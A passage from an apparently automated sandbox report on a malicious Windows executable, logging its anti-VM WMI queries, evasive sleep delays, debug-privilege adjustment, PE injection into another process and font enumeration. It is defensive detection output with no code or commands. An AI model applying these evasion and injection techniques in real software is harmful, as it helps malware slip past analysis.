                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: lWnSA7IyVc.exe PID: 2008, type: MEMORYSTR
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMemory allocated: 2530000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMemory allocated: 4530000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMemory allocated: 8D60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMemory allocated: 9D60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMemory allocated: 9F80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMemory allocated: AF80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMemory allocated: 1880000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMemory allocated: 32B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWindow / User API: threadDelayed 1909Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWindow / User API: threadDelayed 7830Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exe TID: 1800Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exe TID: 7208Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: lWnSA7IyVc.exe, 00000002.00000002.1868707431.0000000001470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeMemory written: C:\Users\user\Desktop\lWnSA7IyVc.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeProcess created: C:\Users\user\Desktop\lWnSA7IyVc.exe "C:\Users\user\Desktop\lWnSA7IyVc.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Users\user\Desktop\lWnSA7IyVc.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\lWnSA7IyVc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
